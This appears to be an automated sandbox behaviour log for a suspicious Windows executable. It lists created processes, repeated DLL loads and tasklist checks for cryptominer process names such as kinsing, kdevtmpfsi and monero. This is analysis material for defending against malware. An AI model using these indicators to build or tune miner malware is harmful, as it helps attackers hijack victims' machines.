Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq monero.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kinsing.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq asOELnch.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kdevtmpfsi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
